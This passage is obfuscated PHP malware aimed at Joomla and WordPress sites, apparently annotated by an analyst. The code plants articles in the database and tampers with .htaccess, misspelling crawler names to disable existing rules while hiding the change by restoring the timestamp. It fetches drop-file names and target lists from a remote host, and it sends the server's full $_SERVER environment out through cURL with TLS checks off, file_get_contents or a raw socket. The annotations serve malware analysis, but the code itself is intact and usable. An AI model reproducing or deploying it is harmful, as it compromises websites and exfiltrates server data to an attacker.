Joomla's #__content through JFactory::getDBO() and returns "id:alias", or false after printing the DB error. */function iljiji($ljljj,$llllliill,$ljllj){$lljj=JFactory::getDBO();$ljljlii=new 
stdClass;$ljljlii->id=null;$ljljlii->title=$ljljj;$ljljlii->introtext=$llllliill;$ljljlii->fulltext=$ljllj;$ljljlii->state=(-0622- -052- -0551);$ljljlii->access=(0326- -0256-0603);$ljljlii->created_by=(0376+-0245-033);$ljljlii->created=date("\x59-m-d H:i:s");$ljljlii->alias=JFilterOutput::stringURLSafe($ljljlii->title);if(!$lljj->insertObject("#__\x63ontent",$ljljlii,"id")):echo$lljj->stderr();return false;endif;return$ljljlii->id.":".$ljljlii->alias;}/* iii(): runs on every request. If .htaccess exists it is chmodded to 0666; when it mentions google, yahoo or bing, the crawler names are misspelled (google to goog1e, and so on) and HTTP_USER_AGENT is swapped for HTTP_REFERER, which disables any existing rules keyed on those strings. The file is written back and its mtime restored. */function iii(){$ljjlijiij=".ht\141ccess";if(file_exists($ljjlijiij)):$liiiiil=filemtime($ljjlijiij);@chmod($ljjlijiij,0774-0106);$ljjjiijill=file_get_contents($ljjlijiij);if(preg_match("#goo\x67le|yahoo|bing#\151Us",$ljjjiijill)):$ljjjiijill=preg_replace("#google#iUs","goog1e",$ljjjiijill);$ljjjiijill=preg_replace("#yahoo#iUs","yanoo",$ljjjiijill);$ljjjiijill=preg_replace("#bing#iUs","b1ng",$ljjjiijill);$ljjjiijill=preg_replace("#baidu#iUs","ba1du",$ljjjiijill);$ljjjiijill=preg_replace("#sez\156am#iUs","sesnam",$ljjjiijill);$ljjjiijill=preg_replace("#crawl#iUs","craw1",$ljjjiijill);$ljjjiijill=preg_replace("\043\134|a\x6fl\x5c|#iUs","|\x61o1|",$ljjjiijill);$ljjjiijill=preg_replace("#HTTP_USER_AGE\116\x54#i\x55s","HTTP_REFERER",$ljjjiijill);endif;file_put_contents($ljjlijiij,$ljjjiijill);@touch($ljjlijiij,$liiiiil);endif;}/* ii(): asks the remote host for drop-file names for the detected platform; with count "all" the reply is split on "::" and the trailing element dropped. */function ii($ljilijii,$liljl,$lll,$lljjjiliji,$lijjllljli){$lljl=$liljl."?getfi\x6cename&p\x6catform=".$ljilijii."&count=".$lijjllljli;$lijjijjiij=$lljjjiliji."?getf\x69lename&\160latfor\x6d=".$ljilijii."&count=".$lijjllljli;$lijjjjl=ij($lljl,$lll,$lijjijjiij,$llilijjl="no");if($lijjllljli=="a\154l"):$lijjjjl=explode("::",$lijjjjl,-(0226+-0252+-010- -035));endif;return$lijjjjl;}/* ijj(): fetches a "::"-separated list of the given type ("baddirs" / "filestoinc") from the spider endpoint and drops the trailing element. */function ijj($lll,$ljljiilj,$ljljjjlij,$ljjlijjil){$lljl=$ljljiilj."&typ\x65=".$ljjlijjil;$lijjijjiij=$ljljjjlij."&type=".$ljjlijjil;$liljiijiilj=ij($lljl,$lll,$lijjijjiij,$llilijjl="no");$liljiijiilj=explode("::",$liljiijiilj,-(01111+-01110));return$liljiijiilj;}/* ijl(): lists sub-directories of the given path; for the start marker "^_^" it scans the current directory and also tags the platform as wp, jm or other. */function 
ijl($liijijlilj,$ljilijii){if($liijijlilj=="^_^"):foreach(glob("*") as$liililij):if(is_dir($liililij)):$ljjli[]=$liililij;endif;if(stristr($liililij,"wp-config.php")):$ljilijii="wp";elseif(stristr($liililij,"\x63onfiguration.php")):$ljilijii="jm";endif;if($ljilijii===null):$ljilijii="other";endif;endforeach;else:foreach(glob($liijijlilj.DIRECTORY_SEPARATOR."*") as$liililij):if(is_dir($liililij)):$ljjli[]=$liililij;endif;endforeach;endif;return array($ljjli,$ljilijii);}/* client_version(): despite the name, converts a 32-bit integer to a dotted-quad IPv4 string (the octal sums all evaluate to 256), i.e. a hand-rolled long2ip(). The two extra parameters are unused. */function client_version($lijil,$liljjililii=false,$lljilj=0106356){$lijijjlilj[0653- -01372-051+-02174]=(int)($lijil/(0436+-036)/(-0213- -0155-0303- -0741)/(0765-0466-0631- -0732));$lijijjlilj[-01017-0507- -0561+0746]=(int)(($lijil-$lijijjlilj[0121+0221-0342]*(02041-01441)*(0276-0437+0541)*(01075+-0475))/(0350- -030)/(0123-01170-05- -01452));$lijijjlilj[0256+-01140- -0664]=(int)(($lijil-$lijijjlilj[0210-0210]*(0715+0660-01175)*(01037-0437)*(-0370+-066- -0500+0356)-$lijijjlilj[01117+01405-02523]*(-0573-02100+0436- -02635)*(01103- -0212+-0715))/(0300-0672- -0772));$lijijjlilj[040-035]=$lijil-$lijijjlilj[01341+-01341]*(0346- -032)*(-0764- -05+01003+0354)*(-0760-0612+-0143- -02335)-$lijijjlilj[060+037-023+-073]*(0674-055-045+-0152)*(-0414+01014)-$lijijjlilj[0374+053-0656- -0211]*(0247-0257- -0410);return''.$lijijjlilj[-0147- -027- -02- -0116].".".$lijijjlilj[-0103+0531+-0425].".".$lijijjlilj[0253+01551+01264-03306].".".$lijijjlilj[01142- -0167+-01326];}/* ij(): outbound HTTP helper. Tries cURL (TLS peer and host verification switched off for https), then file_get_contents() when allow_url_fopen is on, then a raw fsockopen() to port 80. Every variant POSTs http_build_query($_SERVER), so the full server/request environment leaves the host on each call; egress logs with POSTs to /get.php are the network-side indicator. */function 
ij($lljl,$ljlijli,$lijjijjiij,$llilijjl,$liljllljiii=-2.3079809663817){$ljjjlj="60";if(in_array("curl",get_loaded_extensions())):if($llilijjl=="yes"):if(strstr($lljl,"\x3f")):$lljl=$lljl."&type=curl";else:$lljl=$lljl."?\x74ype=c\165rl";endif;endif;$liilj=curl_init();curl_setopt($liilj,CURLOPT_URL,$lljl);if(preg_match("#^http\163:/\057#",$lljl)):curl_setopt($liilj,CURLOPT_SSL_VERIFYPEER,false);curl_setopt($liilj,CURLOPT_SSL_VERIFYHOST,false);endif;curl_setopt($liilj,CURLOPT_HEADER,false);curl_setopt($liilj,CURLOPT_RETURNTRANSFER,true);curl_setopt($liilj,CURLOPT_REFERER,"");curl_setopt($liilj,CURLOPT_CONNECTTIMEOUT,"5");curl_setopt($liilj,CURLOPT_TIMEOUT,$ljjjlj);curl_setopt($liilj,CURLOPT_POSTFIELDS,http_build_query($_SERVER));$ljijll=@curl_exec($liilj);curl_close($liilj);elseif(ini_get("al\154ow_\165rl\x5f\146open")==(0765- -0120+-01104)):$lilijlljj=stream_context_create(array("http"=>array("method"=>"\120OST","heade\x72"=>array("Content\055t\x79pe: \141pplication/x-www-f\x6f\x72m-ur\154encoded"),"co\x6etent"=>http_build_query($_SERVER),"ti\155eout"=>$ljjjlj)));if($llilijjl=="yes"):if(strstr($lljl,"?")):$lljl=$lljl."&type=fopen";else:$lljl=$lljl."?\x74ype=fo\160en";endif;endif;$ljijll=@file_get_contents($lljl,false,$lilijlljj);else:if($llilijjl=="yes"):if(strstr($lijjijjiij,"?")):$lijjijjiij=$lijjijjiij."&type=\163ocks";else:$lijjijjiij=$lijjijjiij."?type=so\143k\163";endif;endif;$lijl=fsockopen($ljlijli,056+-0432-0326- -01022,$lilililjjl,$lljlij,$ljjjlj);if($lijl):$ljlijjj=http_build_query($_SERVER);$liliilj="POST ".$lijjijjiij." 
HTTP/1.0"."\015\x0a";$liliilj.="Host: ".$ljlijli."\x0d\x0a";$liliilj.="Content-Ty\x70e: appl\151cation/x-www-form-urle\x6e\x63o\x64ed"."\x0d\x0a";$liliilj.="\103ont\145nt\055Length: ".strlen($ljlijjj)."\015\x0a\015\x0a";fwrite($lijl,$liliilj);fwrite($lijl,$ljlijjj);$ljiijllijii="";while(!feof($lijl)):$ljiijllijii.=fgets($lijl,06670-07151+010261);endwhile;fclose($lijl);list($llilljlj,$ljllljj)=@preg_split("\057\x5cR\134R\057",$ljiijllijii,0251+-0125-0122);$ljijll=$ljllljj;endif;endif;return$ljijll;};